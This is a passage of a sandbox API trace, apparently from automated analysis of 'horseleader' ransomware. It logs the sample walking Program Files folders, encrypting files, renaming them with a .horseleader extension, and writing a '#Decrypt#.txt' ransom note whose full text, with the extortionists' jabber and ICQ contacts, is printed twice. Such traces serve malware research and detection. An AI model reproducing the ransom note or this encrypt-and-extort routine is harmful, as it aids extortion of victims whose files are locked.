pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0252.047] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet 
Explorer\\SIGNUP\\install.ins") returned 57 [0252.047] StrStrW (lpFirst="install.ins", lpSrch=".txt") returned 0x0 [0252.047] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=460) returned 1 [0252.047] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1cc, lpOverlapped=0x0) returned 1 [0252.049] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1cc, lpOverlapped=0x0) returned 1 [0252.049] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0252.049] CloseHandle (hObject=0x21c) returned 1 [0252.049] GetProcessHeap () returned 0x780000 [0252.050] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.050] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.horseleader") returned 69 [0252.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet 
explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.horseleader" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.horseleader")) returned 1 [0252.050] GetProcessHeap () returned 0x780000 [0252.050] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0252.051] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="install.ins", cAlternateFileName="")) returned 0 [0252.051] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.051] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\#Decrypt#.txt") returned 59 [0252.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\signup\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.051] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.051] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.053] lstrlenA (lpString="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") returned 1368 [0252.053] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.053] CloseHandle (hObject=0x1cc) returned 1 [0252.053] GetProcessHeap () returned 0x780000 [0252.053] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.053] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0252.053] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Windows") returned -1 [0252.053] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 49 [0252.054] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".horseleader") returned 0x0 [0252.054] lstrcmpW (lpString1="sqmapi.dll", lpString2="#Decrypt#.txt") returned 1 [0252.054] lstrcmpW (lpString1="sqmapi.dll", lpString2="_uninstalling_.png") returned 1 [0252.054] lstrlenW (lpString=".testttjffg") returned 11 [0252.054] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll", 
lpSrch=".testttjffg") returned 0x0 [0252.054] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.054] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.054] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0252.054] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.054] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\#Decrypt#.txt") returned 52 [0252.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.055] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber 
(Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.055] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.056] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.056] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.056] CloseHandle (hObject=0x164) returned 1 [0252.056] 
GetProcessHeap () returned 0x780000 [0252.057] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.057] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0252.057] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Windows") returned -1 [0252.057] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services") returned 48 [0252.057] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0252.057] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0252.057] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.057] GetProcessHeap () returned 0x780000 [0252.057] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0252.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*") returned 50 [0252.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, 
ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.057] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\.") returned 50 [0252.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.057] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.058] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.058] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\..") returned 51 [0252.058] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.058] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.058] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93776350, ftCreationTime.dwHighDateTime=0x1d5a768, ftLastAccessTime.dwLowDateTime=0xa8f83b60, ftLastAccessTime.dwHighDateTime=0x1d59dcb, ftLastWriteTime.dwLowDateTime=0xa8f83b60, ftLastWriteTime.dwHighDateTime=0x1d59dcb, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="accupos.exe", cAlternateFileName="")) returned 1 [0252.058] lstrcmpiW (lpString1="accupos.exe", lpString2="Windows") returned -1 [0252.058] wnsprintfW (in: 
pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe") returned 60 [0252.058] StrStrIW (lpFirst="accupos.exe", lpSrch=".horseleader") returned 0x0 [0252.058] lstrcmpW (lpString1="accupos.exe", lpString2="#Decrypt#.txt") returned 1 [0252.058] lstrcmpW (lpString1="accupos.exe", lpString2="_uninstalling_.png") returned 1 [0252.058] lstrlenW (lpString=".testttjffg") returned 11 [0252.058] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe", lpSrch=".testttjffg") returned 0x0 [0252.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe" (normalized: "c:\\program files\\microsoft analysis services\\accupos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.059] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0252.059] lstrcmpiW (lpString1="AS OLEDB", lpString2="Windows") returned -1 [0252.059] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis 
Services\\AS OLEDB") returned 57 [0252.059] lstrcmpW (lpString1="AS OLEDB", lpString2=".") returned 1 [0252.059] lstrcmpW (lpString1="AS OLEDB", lpString2="..") returned 1 [0252.059] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.059] GetProcessHeap () returned 0x780000 [0252.059] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.059] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*") returned 59 [0252.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.060] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.060] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\.") returned 59 [0252.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, 
dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.060] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.060] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\..") returned 60 [0252.060] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.060] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="10", cAlternateFileName="")) returned 1 [0252.061] lstrcmpiW (lpString1="10", lpString2="Windows") returned -1 [0252.061] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned 60 [0252.061] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0252.061] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0252.061] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.061] GetProcessHeap () returned 0x780000 [0252.061] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.061] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*") returned 62 [0252.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0252.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.063] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\.") returned 62 [0252.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.063] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0252.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.064] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\..") returned 63 [0252.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.064] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0252.064] lstrcmpiW (lpString1="Cartridges", lpString2="Windows") returned -1 [0252.064] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 71 [0252.064] lstrcmpW (lpString1="Cartridges", lpString2=".") returned 1 [0252.064] lstrcmpW (lpString1="Cartridges", lpString2="..") returned 1 [0252.064] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.064] GetProcessHeap () returned 0x780000 [0252.064] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.064] wnsprintfW (in: pszDest=0x7dc820, 